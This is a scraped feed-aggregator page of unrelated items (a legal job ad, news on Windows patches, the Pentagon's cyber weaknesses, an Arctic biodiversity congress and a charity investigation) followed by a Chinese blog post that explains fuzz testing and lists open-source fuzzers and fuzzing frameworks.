Next Page: 10000

          Legal Counsel - Trade Publishing      Cache   Translate Page      

A super new opportunity has arisen with a highly successful London based trade publisher for a talented and motivated Legal Counsel.  This role will support the Head of Legal to provide legal services to the London office and its trading divisions.  This is a highly responsible role and would suit a commercially-minded qualified legal professional, looking for an opportunity to bring their experience to a major publishing organisation.

Reporting to the Head of Legal, the Legal Counsel will provide accessible, commercial and technically strong advice to the various business divisions of the organisation and the role will involve reviewing, drafting, negotiating and advising on a wide range of commercial contracts/arrangements, including the acquisition and exploitation of intellectual property rights (including licences and a variety of publishing contracts), plus, distribution agreements, digital media contracts, IT contracts, Cloud computing, content acquisition, and author/editor contracts. 

The Legal Counsel will develop and review standard contract templates and terms and conditions and will also be involved with on-going review and maintenance of policies, procedures and controls and associated mechanisms to support strategic goals and to ensure compliance with applicable rules, regulations and laws.

You will play a fundamental and proactive role in developing the legal team, both in relation to enhancing the support provided by the legal team to the business and also in promoting best practice and contributing to the overall performance of the legal team itself.

This is a key position in the team and the successful person will be LLB, BVC or LPC qualified and a member of the Law Society or Bar Council, and will have a minimum of 5 years post qualified experience in private practice or in-house.  Experience from the publishing/media, or similar industry would be an advantage.  You will be commercially focused with excellent drafting skills, along with strong written and oral communication skills, and able to efficiently manage your workload and projects within set timelines and to budget.

For more detailed information please contact me on 0207 048 6223 for a confidential call, or email your details to me at theresa@redwoodrecruitment.com

Reference: 
LC091018
Company: 
Location (from list): 
London, UK
Employment type: 
Permanent
Type: 
Specialist, Licensing
Job sector: 
Professional, Trade
Required languages: 
English
Required skills: 
5 years PQE in private practice or in house, Legal experience within the publishing/media sector
Application email: 
Salary description: 
Very attractive salary plus bonus and generous benefits package

          Buy Essays Cheap at a Glance      Cache   Translate Page      
Buy Essays Cheap at a Glance Ruthless Buy Essays Cheap Strategies Exploited You will need to upload the paperwork as an alternative to placing them Whether it’s an online writing portfolio. During your faculty knowledge, you’re going to be expected to write kinds paper writing online and many fashions of essays and the custom writing … Continue reading "Buy Essays Cheap at a Glance"
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          Systems Maintenance Technician and Trainer - Leidos - Virginia Beach, VA      Cache   Translate Page      
Recent Operational experience in Ships Signals Exploitation Space (SSES) aboard CG, DDG, or LPD class ships....
From Leidos - Thu, 04 Oct 2018 17:07:40 GMT - View all Virginia Beach, VA jobs
          Windows 10 v1803 et KB4462919, quoi de neuf ?      Cache   Translate Page      

Microsoft publie à l’occasion du Patch Tuesday du mois d’octobre 2018, KB4462919 pour les PC sous Windows 10 v1803. Cette mise à jour cumulative s’attaque à la sécurité et corrige des problèmes. L’installation de KB4462919 permet de faire évoluer le système d’exploitation en version 17134.345. Ce chiffre est important car il permet de vérifier que ...

The post Windows 10 v1803 et KB4462919, quoi de neuf ? appeared first on GinjFo.


          Windows 10, KB4462919, KB4462918 et KB4462937 débarquent      Cache   Translate Page      

A l’occasion du Patch Tuesday du mois d’octobre 2018, Microsoft publie de nouvelles mises à jours cumulatives pour Windows 10. Elles visent toutes les versions prises en charge du système d’exploitation. Le Patch Tuesday est le jour de la grande maintenance logicielle de Microsoft. Elle apporte, au travers de multiples mises à jour cumulatives, des ...

The post Windows 10, KB4462919, KB4462918 et KB4462937 débarquent appeared first on GinjFo.


          Exclusive: Jessica Simpson Talks Personal Style, Baby No. 3 and Being a ‘Fashion Icon’ – Footwear News      Cache   Translate Page      
Footwear NewsEntertainers and fashion exploits have long gone hand in hand, but powerhouse singer Jessica Simpson has managed to crack a tough code. The actress, music star and mother (now expecting her third child) has built — and sustained — her billion-dollar … …read more Source:: Fashion News By Google News
          Un exploit permite conseguir permisos de root en cualquier router MikroTik      Cache   Translate Page      

La seguridad no es precisamente uno de los puntos fuertes de MikroTik. En lo que va de año este fabricante ha sido noticia debido a una serie de vulnerabilidades en sus routers, fallos de seguridad que han permitido desde utilizarlos para minar criptomonedas hasta reenviar el tráfico a webs controladas por piratas informáticos. Hoy, este fabricante

El artículo Un exploit permite conseguir permisos de root en cualquier router MikroTik se publicó en RedesZone.


          Hundreds of scientists, leaders in Lapland for Arctic Biodiversity Congress      Cache   Translate Page      

Finland is hosting the Arctic Biodiversity Congress this week, where 450 scientists, government officials, indigenous peoples and experts from 26 countries are discussing safeguarding the Arctic environment. Finland is chair of the Arctic Council from 2017-2019, and hosting two high-level environmental meetings this month.

Finnish President Sauli Niinistö was also in attendance at this week's congress, which began, well, above the Arctic Circle, in Lapland's city of Rovaniemi on Tuesday.

Niinistö opened the four-day congress by pointing out what was likely already on many attendees' minds, a report issued Monday by the IPCC - the UN's Intergovernmental Panel on Climate Change - which said that avoiding global climate chaos will require an unprecedented transformation of society and the world economy, and that time is running out to avoid disaster.

The report called for radical cuts in energy consumption and a rapid shift away from fossil fuels.

"As we all know, the IPCC just yesterday published its latest special report on global warming. It had a very clear message to policymakers. We urgently need to enhance and speed up our efforts to achieve the goals of the Paris Climate Agreement," Niinistö said.

"This is particularly relevant for the Arctic. As the IPCC report points out, the Arctic region is one of the most vulnerable systems on our planet, if and when global warming continues. And on the other hand, the melting of sea ice and other changes in the Arctic region accelerate climate change on a global scale. I have said this before: if we lose the Arctic, we lose the globe," Niinistö continued.

Finland seeks action from Arctic states

Niinistö also said Finland would like to see Arctic states, at "the highest political level commit to reducing black carbon emissions. Reducing flaring in oil and gas production, switching from heavy fuels to LNG in ship engines, upgrading old-fashioned power plants, and preventing wildfires."

"The discussions I have had preparing for the possible [Arctic] summit have given me reason for some optimism. Climate change may not be the best conversation starter in every capital these days, but you can still find constructive ways to address the concrete issues behind it," Niinistö said.

"There is hope. We still have a chance to save the Arctic, and to save the globe. But there is no time to waste," he said.

Biodiversity in the Arctic

This week's congress will feature keynote speeches from prominent experts in Arctic science and policy, and global environmental cooperation.

The environment ministry's councillor on environmental biodiversity, Marina Von Weissenberg, is one of the conference organisers and said she has high hopes for the meeting, adding that the IPCC report will likely spark debate at this week's meeting.

"There will certainly be a great deal of discussion. We know that climate change is the biggest threat to the Arctic region. The official goal is [an overall] global warming limit of 1.5 degrees, which in the Arctic region means an increase in temperature of between 6-7 degrees. It is clear that the flora and fauna will suffer terribly," she said.

"I hope that the topics discussed at the conference give a little nudge to the UN system, that we have to follow up on agreements we've made on biological diversity and transport sector regulations," von Weissenberg said.

The meeting will also feature scientific reports on the acidification of the Arcitic Sea and how environmental toxins are affecting fish and other marine life.

Science rules at Arctic Council

Although research is not always taken into consideration by policy makers, von Weissenberg said the Arctic Council listens to researchers.

"The Arctic Council has done a great job. It has been a joy to observe cooperation between, for example the US, Canada, Finland and Russia, which is based on the best scientific data available," von Weissenberg said.

The Arctic region is one of the areas on the planet least affected by humans, but it is also threatened by global climate change and exploitation of resources. Local communities, as well as indigenous peoples rely on the Arctic for their livelihoods but climate change in the region also poses serious threats for the entire world, according to von Weissenberg.

"Even though it's a small number of countries we're talking about [in the Arctic region], the polar region impacts the condition of the entire planet," she said.


          Coming Thursday: How an Acclaimed American Charity Failed Some of the World’s Most Vulnerable Girls      Cache   Translate Page      

Katie Meyler captivated Americans with the stories of girls she met in Monrovia, Liberia, who she said were so poor that they had to sell their bodies just to buy clean drinking water. Her social media followers gave her money to send them to school. She started a charity called More Than Me, and in 2012 she won $1 million live on NBC to build a school of her own.

Her charity was created to save these vulnerable girls from sexual exploitation. But from the very beginning, girls were being raped by a man Meyler trusted. He was a former child soldier, the charity’s first staff member and, at one point, Meyler’s lover. After a yearlong ProPublica investigation, reporter Finlay Young delves into the question of who is responsible when those who help also cause enduring and irreversible harm.

The story and an accompanying documentary will publish on Oct. 11, in partnership with Time magazine. Sign up below and we'll email it to you when it goes live.


          YOUNG MINISTERS RETREAT 2018      Cache   Translate Page      
DESCRIPTION YOUNG MINISTERS RETREAT 2018 Theme: Explosive Exploits (72 Hours Firerization) Ministeri
          Chorus subcontractors exploited - First Union      Cache   Translate Page      
Subcontracters working for broadband installer Chorus have been exploiting migrant workers - taking their cash and promising visas in return. Chorus chief executive Kate McKenzie said the company had no idea its subcontracters had been doing this and it was working to fix the problem. First Union general secretary Dennis Maga says the problem is rife within the industry, with migrants afraid to speak out for fear of being deported. He says Chorus should take some responsbility for the problem.
          Women have been worst sufferers of mob violence due to religious intolerance: Nayantara Sahgal      Cache   Translate Page      
Describing fundamentalism as a frontal attack on humanity, eminent writer Nayantara Sahgal on Tuesday said women have been the worst sufferers of mob violence that occurred due to religious intolerance.Delivering the 24th Justice Sunanda Bhandare Memorial lecture on Women under Religious Fundamentalism,Ms. Sahgal lamented that India has today become the worlds most dangerous country for women.Citing the instances of mob violence resulting in rape of women during the partition of India and later, during the Bangladesh liberation war, Mrs Sahgal said women have been the worst sufferers of mob violence that occurred due to religious intolerance.Speaking at the event, graced by eminent dignitaries including former Prime Minister Manmohan Singh, Mr Ak Judge ,Supreme Court of India and Mr. Rajendra Menon,Chief Justice ,Delhi High Court, the writer said religious fundamentalism is against the spirit of our Constitution.The Constitution of India has granted equal rights to all, irrespective of their caste, religion and sex. India is one of the few countries where women have the right to vote since it became a Republic. Religious fundamentalism is against the spirit of our Constitution. It is a frontal attack on humanity,she said.Ms. Sahgal said that late Justice Bhandare made a distinct mark in a predominantly mans world. She understood a judges role as a sentinel of progress in a developing society. She believed that a womans place in the society marks the level of civilization,Mrs Sahgal said.Speaking on his occasion, Chief Guest Justice A. K. Sikri, Judge, Supreme Court of India, reminisced his acquaintance with Justice Sunanda Bhandare.He considered it a pleasant task to speak something on Justice Bhandare, who commanded respect of the young Bar and was called by them the Mother Bench.Justice Rajendra Menon, Chief Justice of Delhi High Court, presided over the meeting, which was attended by judges, advocates, professors, students, activists and representatives of civil society organisations.This year, the Justice Sunanda Bhandare Award was conferred on the Naz Foundation (India) Trust for its sustained campaign on equal rights for all, its remarkable work in empowering girls and ensuring their capacity building, its consistent endeavour in educating the public about the prevention of transmission of HIV and its petition first in the Delhi High Court and then the curative petitions and interventions in the Supreme Court of India that resulted in the eventual decriminalization of Section 377.Every year, the Memorial Lecture is organized by the Justice Sunanda Bhandare Foundation to perpetuate the memory of late Justice Bhandare, a renowned judge of Delhi High Court, who was sensitive towards issues that involved the exploitation of women, children and weaker sections of the society.UNI AVK AR RHK 2339
          Annonce : PONEY NEW FOREST - 11 ANS      Cache   Translate Page      
TAREK D'AVETTE – NEW FOREST Né le 03/07/2007 – 1,42m Poney polyvalent, très bon niveau de dressage. Idéal pour école, concours (club/amateur), loisirs. Attelé en solo, paire, tandem et team. Excellent mental, fiable, sûr, embarque et voyage très bien. Je vends ce très bon poney par manque de temps pour exploiter pleinement ses qualités. PRIX : 4.500€ Pour tout renseignement : Laurent DERVIEUX – 06.29.88.26.43 attelagesdeceuze@free.fr
          Illegal alien men sneak children into US to exploit ‘family loophole’      Cache   Translate Page      

The Washington Times reports, “Men now make up about 40 percent of illegal immigrant parents trying to sneak children into the U.S., as they leap to take advantage of the “family loophole” that means illegal immigrants who come with children get treated more leniently.” Pointing to a Border Patrol report, fraud has also soared. From […]

The post Illegal alien men sneak children into US to exploit ‘family loophole’ appeared first on The Hayride.


          Fuzzing技术总结与工具列表      Cache   Translate Page      
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/wcventure/article/details/82085251

首先推荐阅读2018年computing Surveys 的《Fuzzing: Art, Science, and Engineering》
https://github.com/wcventure/wcventure/blob/master/Paper/Fuzzing_Art_Science_and_Engineering.pdf
其次推荐阅读2018年Cybersecurity 的 《Fuzzing: a survey》
https://www.researchgate.net/publication/325577316_Fuzzing_a_survey
里面对fuzzing技术和fuzzing工具有详细的介绍。

一、什么是Fuzzing?

Fuzz本意是“羽毛、细小的毛发、使模糊、变得模糊”,后来用在软件测试领域,中文一般指“模糊测试”,英文有的叫“Fuzzing”,有的叫“Fuzz Testing”。本文用fuzzing表示模糊测试。

Fuzzing技术可以追溯到1950年,当时计算机的数据主要保存在打孔卡片上,计算机程序读取这些卡片的数据进行计算和输出。如果碰到一些垃圾卡片或一些废弃不适配的卡片,对应的计算机程序就可能产生错误和异常甚至崩溃,这样,Bug就产生了。所以,Fuzzing技术并不是什么新鲜技术,而是随着计算机的产生一起产生的古老的测试技术。

Fuzzing技术是一种基于黑盒(或灰盒)的测试技术,通过自动化生成并执行大量的随机测试用例来发现产品或协议的未知漏洞。随着计算机的发展,Fuzzing技术也在不断发展。

二、Fuzzing有用么?

Fuzzing是模糊测试,顾名思义,意味着测试用例是不确定的、模糊的。

计算机是精确的科学和技术,测试技术应该也是一样的,有什么的输入,对应什么样的输出,都应该是明确的,怎么会有模糊不确定的用例呢?这些不确定的测试用例具体会有什么作用呢?

为什么会有不确定的测试用例,我想主要的原因是下面几点:

1、我们无法穷举所有的输入作为测试用例。我们编写测试用例的时候,一般考虑正向测试、反向测试、边界值、超长、超短等一些常见的场景,但我们是没有办法把所有的输入都遍历进行测试的。

2、我们无法想到所有可能的异常场景。由于人类脑力的限制,我们没有办法想到所有可能的异常组合,尤其是现在的软件越来越多的依赖操作系统、中间件、第三方组件,这些系统里的bug或者组合后形成的bug,是我们某个项目组的开发人员、测试人员无法预知的。

3、Fuzzing软件也同样无法遍历所有的异常场景。随着现在软件越来越复杂,可选的输入可以认为有无限个组合,所以即使是使用软件来遍历也是不可能实现的,否则你的版本可能就永远也发布不了。Fuzzing技术本质是依靠随机函数生成随机测试用例来进行测试验证,所以是不确定的。

这些不确定的测试用例会起到我们想要的测试结果么?能发现真正的Bug么?

1、Fuzzing技术首先是一种自动化技术,即软件自动执行相对随机的测试用例。因为是依靠计算机软件自动执行,所以测试效率相对人来讲远远高出几个数量级。比如,一个优秀的测试人员,一天能执行的测试用例数量最多也就是几十个,很难达到100个。而Fuzzing工具可能几分钟就可以轻松执行上百个测试用例。

2、Fuzzing技术本质是依赖随机函数生成随机测试用例,随机性意味着不重复、不可预测,可能有意想不到的输入和结果。

3、根据概率论里面的“大数定律”,只要我们重复的次数够多、随机性够强,那些概率极低的偶然事件就必然会出现。Fuzzing技术就是大数定律的典范应用,足够多的测试用例和随机性,就可以让那些隐藏的很深很难出现的Bug成为必然现象。

目前,Fuzzing技术已经是软件测试、漏洞挖掘领域的最有效的手段之一。Fuzzing技术特别适合用于发现0 Day漏洞,也是众多黑客或黑帽子发现软件漏洞的首选技术。Fuzzing虽然不能直接达到入侵的效果,但是Fuzzing非常容易找到软件或系统的漏洞,以此为突破口深入分析,就更容易找到入侵路径,这就是黑客喜欢Fuzzing技术的原因。

三、基于生成和基于编译的Fuzzing算法?*

Fuzzing引擎算法中,测试用例的生成方式主要有2种:
1)基于变异:根据已知数据样本通过变异的方法生成新的测试用例;
2)基于生成:根据已知的协议或接口规范进行建模,生成测试用例;
一般Fuzzing工具中,都会综合使用这两种生成方式。

基于变异的算法核心要求是学习已有的数据模型,基于已有数据及对数据的分析,再生成随机数据做为测试用例。

四、state-of-the-art AFL

AFL就是著名的基于变异的Fuzzer。
以下有一些关于state-of-the-art AFL的资料

  1. american fuzzy lop (2.52b)
    http://lcamtuf.coredump.cx/afl/
  2. AFL内部实现细节小记
    http://rk700.github.io/2017/12/28/afl-internals/
  3. afl-fuzz技术白皮书
    https://blog.csdn.net/gengzhikui1992/article/details/50844857
  4. 如何使用AFL进行一次完整的fuzz过程
    https://blog.csdn.net/abcdyzhang/article/details/53487683
  5. AFL(American Fuzzy Lop)实现细节与文件变异
    https://paper.seebug.org/496/
  6. fuzz实战之libfuzzer
    https://www.secpulse.com/archives/71898.html

1

- Static analysis
- Dynamic analysis
- Symbolic execution
- Fuzzing

T1

- Generation-based Fuzzing
- Mutation-based Fuzzing

T2

- White box fuzzing
- Grey box fuzzing
- Black box fuzzing

T3

- Fuzzing技术中的关键

T4

- Fuzzing 中

T5

- 至今fuzzing工具文献的引用关系,Fuzzing工具的分类和历史

F1

- Fuzzing 工具之调研,还有一张很好的整理后的图表

F2

最后,再整理一下部分开源fuzzing工具的列表
原文来自:[https://www.peerlyst.com/posts/resource-open-source-fuzzers-list],并增加2018年最新的诸如CollAFL和SnowFuzz等工具
1.开源Fuzzers工具
2.Fuzzing的线束或框架
3.其它 Fuzzers 工具是免费的,但是和开源比不值得一提
4.Fuzzing的有效超载
5.博客将帮助你更好的了解Fuzz
6.其它关于Fuzzing博客或资源
7.商业Fuzzers工具

1.开源Fuzzers

CollAFLhttp://chao.100871.net/papers/oakland18.pdf
路径敏感的Fuzzer,解决了AFL中bitmap路径冲突的问题。
并提出了一种选择seed的策略,能更快提高覆盖率。

SnowFuzz
https://arxiv.org/pdf/1708.08437.pdf

VUzzer
http://www.cs.vu.nl//~giuffrida/papers/vuzzer-ndss-2017.pdf
基于应用感知的自进化模糊工具。在这篇文章中,我们提出一个应用感知的进化模糊策略(不需要以前的知识应用或格式输入)。为了最小化地覆盖并扩展更深的路径,我们利用基于静态和动态分析的控制以及数据流功能,来推断应用程序的基本属性。与Application-agnostic方法相比,这可以更快地生成有趣的输入。我们实行我们的模糊策略在VUzzer上,并且用三种不同的数据评估它:DARPA的大挑战二进制文件(CGC)、一组真实的应用程序(二进制输入解析器)和最近发布的LAVA数据集。

Afl-fuzz(American fuzzy lop)
http://lcamtuf.coredump.cx/afl/
Afl-fuzz是一种基于面向安全的模糊测试工具,它采用了一种新型的方式(编译时检测和遗传算法),来自动发掘干净的、有趣的测试案例,即在目标二进制中触发新的内部状态。这基本上改善了模糊代码的功能覆盖。该工具生成的简洁的合成语料库也可以用来传播其它更多的劳动型或资源密集型测试方案。
与其他仪器化的模糊工具相比,afl-fuzz是以实用性而被设计的:它具有适度的性能开销,采用了多种高效的模糊战略,和努力最小化的技巧,基本上不需要配置,并且能够无缝处理复杂的、真实世界案例,以及常见的图像分析或文件压缩等。

Filebuster
一个非常快速和灵活的网络模糊工具

TriforceAFL
AFL / QEMU 模糊器具有全系统的仿真。这是AFL的修补版本,支持使用QEMU的全系统模糊测试。它所包含的QEMU已经更新,允许在运行x86_64的系统仿真器时进行分支机构跟踪。它也添加了额外的指令来启动AFL的forkserver,进行模糊设置,并标记测试用例的启动和停止。

Nightmare:
https://github.com/joxeankoret/nightmare
一个具有web管理的分布式模糊测试套件。

Grr
DECREE二进制的高吞吐量模糊器和仿真器

Randy:
http://ptrace-security.com/blog/randy-random-based-fuzzer-in-python/
Python中的基于随机的模糊工具

IFuzzer
一个进化型的翻译模糊器

Dizzy:
https://github.com/ernw/dizzy
基于python的模糊框架:
1.可以发送到L2以及上层(TCP / UDP / SCTP)
2.能够处理奇长度分组字段(无需匹配字节边界,因此即使单个标志或7位长字3.也可以表示和模糊)
4.非常容易的协议定义语法
5.能够做多包状态的完全模糊,能够使用接收到的目标数据作为响应

Address Sanitizer:
https://github.com/Google/sanitizers
地址Sanitizer、线Sanitizer、记忆Sanitizer

Diffy:
https://github.com/twitter/diffy
使用Diffy查找您的服务中的潜在错误

Wfuzz:
https://github.com/xmendez/wfuzz
Web应用程序HTTP://www.edge-security.com/wfuzz.php

Go-fuzz:
https://github.com/Google/gofuzz
基于放弃的模糊测试

Sulley:
https://github.com/OpenRCE/sulley
Sulley是一个积极开发的模糊引擎和模糊测试框架,由多个可扩展组件组成。Sulley(IMHO)超过了此前公布的大所属模糊技术、商业和公共领域的能力。框架的目标是不仅是可以简化数据表示,而且也可以简化数据传输和仪表。Sulley是以 Monsters Inc.的生物来命名的,因为,他是模糊的。写在python内的。

Sulley_l2:
http://ernw.de/download/sulley_l2.tar.bz2
有些人可能记得2008年发布的sulley_l2,它是sulley模糊框架的修改版本,增强了第2层发送功能和一堆(L2)模糊脚本。所有的blinking, rebooting, mem-corrupting引起了我们的一些关注。从那以后,我们继续写和使用这些模糊脚本,所以它的洞集合增长了。

CERT Basic Fuzzing Framework (BFF)For linux, OSX
https://github.com/CERTCC-Vulnerability-Analysis/certfuzz
http://www.cert.org/vulnerability-analysis/tools/bff.cfm
cert基本模糊框架(BFF)是一个软件测试工具,它用于在linux和mac os x平台上运行的应用程序中寻找漏洞。BFF对消耗文件输入的软件执行突变性的模糊测试。(突变性模糊测试是采取形式良好的输入数据并以各种方式破坏它的行为,寻找导致崩溃的情况。)BFF自动收集导致了软件以独特方式使测试用例崩溃,以及利用崩溃来调试信息。BFF的目标是去最小化软件供应商和安全研究人员通过模糊测试有效地发现和分析发现的安全漏洞过程中所需要的努力。

CERT Failure Observation Engine (FOE)For windows
http://www.cert.org/vulnerability-analysis/tools/foe.cfmhttps://github.com/CERTCC-Vulnerability-Analysis/certfuzz
The cert Failure Observation Engine (FOE) 是一个软件测试工具,它被用于在Windows平台上运行的应用程序中发现漏洞。FOE在消耗文件输入的软件上执行突变模糊测试。(突变性模糊测试是采取形式良好的输入数据并以各种方式破坏它的行为,寻找导致崩溃的情况。)FOE自动收集导致了软件以独特方式使测试用例崩溃,以及利用崩溃来调试信息。FOE的目标是去最小化软件供应商和安全研究人员通过模糊测试有效地发现和分析发现的安全漏洞过程中所需要的努力。

DranzerFor ActiveX Controls.
https://github.com/CERTCC-Vulnerability-Analysis/dranzer
Dranzer是一个工具,使用户能够检查有效的技术,它用于模糊测试ActiveX控件

Radamsaa general purpose fuzzer
https://github.com/aoh/radamsa
Radamsa是一个用于鲁棒性测试的测试用例生成器,也称为fuzzer。它可以用来测试一个程序是否可以承受格式错误以及潜在的恶意输入。它通过制造文件来工作(有趣的不同于通常给定的文件),然后将修改的文件提供给Target程序,或者这样或通过一些脚本。radamsa的主要卖点(而不是其他的模糊器)是:它是非常容易在大多数机器上运行,而且很容易从命令行脚本,这已经被用来找到程序中的一系列安全问题,而且你可能现在正在使用。

zzufApplication fuzzer
https://github.com/samhocevar/zzuf
zzuf是一个透明的应用程序输入模糊器。 它的工作原理是截取文件操作并更改程序输入中的随机位。zzuf的行为是确定性的,使得它很容易再现错误。 有关如何使用zzuf的说明和示例,请参阅手册页和网站http://caca.zoy.org/wiki/zzuf

Backfuzz
https://github.com/localh0t/backfuzz
Backfuzz是一个用python写成的有着不同协议(FTP,HTTP,IMAP等)的模糊工具。因为一般的想法是这个脚本有几个预定义的功能,所以谁想要编写自己的插件(为另一个协议)就可以在一些行这样做。

KEMUfuzzer
https://github.com/jrmuizel/kemufuzzer
KEmuFuzzer是一个基于仿真或直接本地执行测试系统虚拟机的工具。 目前KEmuFuzzer支持:BHOCS,QEMU,VMware和virtualbox。

Pathgrind
https://github.com/codelion/pathgrind
Pathgrind使用基于路径的动态分析来fuzz linux / unix二进制。 它是基于valgrind被写在python内的。

Wadi-fuzzer
https://www.sensepost.com/blog/2015/wadi-fuzzer/ https://gitlab.sensepost.com/saif/DOM-Fuzzer
Wadi是基于web浏览器语法的模糊器。 这个语法用于描述浏览器应该如何处理Web内容,Wadi转向并使用语法来打破浏览器。
Wadi是一个Fuzzing模块,用于NodeFuzz fuzzing Harness并利用AddressSanitizer(ASan)在Linux和Mac OSX上进行测试。
万维网联盟(W3C)是一个国际组织,它开发开放标准以确保Web的长期增长。 W3C允许我们搜索语法并在我们的测试用例中使用。

LibFuzzer, Clang-format-fuzzer, clang-fuzzer
http://llvm.org/docs/LibFuzzer.html
http://llvm.org/viewvc/llvm-project/cfe/trunk/tools/clang-format/fuzzer/ClangFormatFuzzer.cpp?view=markup
http://llvm.org/viewvc/llvm-project/cfe/trunk/tools/clang-fuzzer/ClangFuzzer.cpp?view=markup
我们在LibFuzzer上实现了两个模糊器:clang-format-fuzzer和clang-fuzzer。Clang格式大多是一个词法分析器,所以给它随机字节格式是会完美运行的,但也伴随着超过20个错误。然而Clang不仅仅是一个词法分析器,给它随机字节时几乎没有划伤其表面,所以除了测试随机字节,我们还在令牌感知模式中模糊了Clang。两种模式中都发现了错误; 其中一些以前被AFL检测到,另一些则不是:我们使用AddressSanitizer运行这个模糊器,结果发现一些错误在没有它的情况下不容易被发现。

Perf-fuzzer
http://www.eece.maine.edu/~vweaver/projects/perf_events/validation/https://github.com/deater/perf_event_testshttp://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/
用于Linux perf_event子系统的测试套件

HTTP/2 Fuzzer
https://github.com/c0nrad/http2fuzz
HTTP2模糊器内置于Golang。

QuickFuzz
http://quickfuzz.org/
QuickFuzz是一个语法模糊器,由QuickCheck,模板Haskell和Hackage的特定库生成许多复杂的文件格式,如Jpeg,Png,Svg,Xml,Zip,Tar和更多! QuickFuzz是开源的(GPL3),它可以使用其他错误检测工具,如zzuf,radamsa,honggfuzz和valgrind。

SymFuzz
https://github.com/maurer/symfuzz
http://ieeexplore.IEEE.org/xpls/abs_all.jsp?arnumber=7163057
摘要?我们提出了一个算法的设计,以最大化数量的bug为黑盒子突变性的模糊给定一个程序和种子的输入。主要的直观性的是利用给定程序 - 种子对的执行轨迹上的白盒符号进行分析,来检测输入的BIT位置之间的依赖性,然后使用这种依赖关系来为该程序种子对计算概率上最佳的突变比率。我们的结果是有希望的:我们发现使用相同的模糊时间,这比8个应用程序中的三个以前的模糊器的平均错误多38.6%。

OFuzz
https://github.com/sangkilc/ofuzz
OFuzz是一个用OCaml编写的模糊平台。 OFuzz目前专注于在* nix平台上运行的文件处理应用程序。 OFuzz的主要设计原则是灵活性:必须容易添加/替换模糊组件(崩溃分类模块,测试用例生成器等)或算法(突变算法,调度算法)。

Bed
http://www.snake-basket.de/
网络协议fuzzer。 BED是一个程序,旨在检查守护程序的潜在缓冲区溢出、格式字符串等。

Neural Fuzzer
https://cifasis.github.io/neural-fuzzer/
神经模糊测试工具是一种实验性模糊器,它被设计使用国家最先进的机器,从一组初始文件学习。 它分为两个阶段:训练和生成。

Pulsar
https://github.com/hgascon/pulsar
协议学习,模拟和状态模糊器
Pulsar是一个具有自动协议学习和模拟能力的网络模糊器。该工具允许通过机器学习技术来建模协议,例如聚类和隐马尔可夫模型。这些模型可以用于模拟Pulsar与真实客户端或服务器之间进行通信,这些消息,在一系列模糊原语的结合下,让测试一个未知协议错误的实施在更深的状态协议。

D-bus fuzzer:
https://github.com/matusmarhefka/dfuzzer
dfuzzer是D-Bus模糊器,是用于通过D-Bus进行通信的模糊测试过程的工具。它可以用于测试连接到会话总线和系统总线守护程序的进程。模糊器为客户端工作,它首先连接到总线守护进程,然后它遍历并模糊测试由D-Bus服务提供的所有方法。

Choronzon
https://census-labs.com/news/2016/07/20/choronzon-public-release/
Choronzon是一个进化型的模糊工具。它试图模仿进化过程,以保持产生更好的结果。 为了实现这一点,它具有评估系统的能力,用以分类哪些模糊文件是有趣的,哪些应该被丢弃。
此外,Choronzon是一个基于知识的模糊器。 它使用用户定义的信息来读取和写入目标文件格式的文件。要熟悉Choronzon的术语,您应该考虑每个文件由染色体表示。用户应该描述所考虑的文件格式的基本结构, 优选文件格式的高级概述,而不是描述它的每个细节和方面。那些用户定义的基本结构中的每一个都被认为是基因, 每个染色体包含一个基因树,并且它能够从中构建相应的文件。

Exploitable
这里写图片描述
‘exploitable’是一个GDB扩展,它会按严重性分类Linux应用程序错误。扩展检查已崩溃的Linux应用程序的状态,并输出攻击者利用底层软件错误获得系统控制有多困难的总结。扩展可以用于为软件开发人员确定bug的优先级,以便他们可以首先解决最严重的bug。
该扩展实现了一个名为“exploitable”的GDB命令。 该命令使用启发式来描述当前在GDB中调试的应用程序的状态的可利用性。 该命令旨在用于包含GDB Python API的Linux平台和GDB版本。 请注意,此时命令将无法在核心文件目标上正确运行。

Hodor
这里写图片描述

我们想设计一个通用的模糊器,可以用来配置使用已知的良好的输入和分隔符,以模糊特定的位置。在一个完全愚钝的模糊器和一些更聪明的东西之间,与实现适当的智能模糊器相比,表现着更少的努力。

BrundleFuzz
https://github.com/carlosgprado/BrundleFuzz
BrundleFuzz是一个用于Windows和Linux的分布式模糊器,使用动态二进制仪器。

Netzob
https://www.netzob.org/
用于通信协议的逆向工程、流量生成和模糊化的开源工具
P
assiveFuzzFrameworkOSX
该框架用于在内核模式下基于被动内联挂钩机制来模糊OSX内核漏洞。

syntribos
OpenStack安全组的Python API安全测试工具

honggfuzz
http://google.github.io/honggfuzz/
一个通用的,易于使用的有趣的分析选项的模糊器。 支持基于代码覆盖率的反馈驱动的模糊测试

dotdotpwn
http://dotdotpwn.blogspot.com/
目录遍历模糊工具

KernelFuzzer
跨平台内核Fuzzer框架。DEF CON 24视频:
https://www.youtube.com/watch?v=M8ThCIfVXow

PyJFuzz
PyJFuzz - Python JSON Fuzzer
PyJFuzz是一个小的、可扩展的和现成可用的框架,用于模糊JSON输入,如移动端点REST API,JSON实现,浏览器,cli可执行和更多。

RamFuzz
单个方法参数的模糊器。

EMFFuzzer
基于桃树模糊框架的增强的元文件模糊器

js-fuzz
一个基于javascript的AFL启发的遗传模糊测试器。

syzkaller
syzkaller是一个无监督的、覆盖引导的Linux系统调用模糊器。

2.模糊线束/框架使fuzzer提高:

FuzzFlow
Fuzzflow是来自cisco talos的一个分布式的模糊管理框架,它提供虚拟机管理,模糊作业配、可插拔变异引擎、前/后变形脚本、崩溃收集和可插拔崩溃分析。

fuzzinator
Fuzzinator是一个模糊测试框架,可以帮助你自动化任务,它通常需要在一个fuzz会话:
运行您最喜欢的测试生成器并将测试用例馈送到测试中的系统,
抓住和保存独特的问题,
减少失败的测试用例,
缓解错误跟踪器中的问题报告(例如,Bugzilla或GitHub),
如果需要,定期更新SUT
计划多个SUT和发电机,而不会使工作站超载。

Fuzzlabs
https://github.com/DCNWS/FuzzLabs
FuzzLabs在一个模块化的模糊框架中,用Python编写。 它使用了令人惊叹的Sulley模糊框架的修改版本作为核心引擎。 FuzzLabs仍在开发中。

Nodefuzz
https://github.com/attekett/NodeFuzz
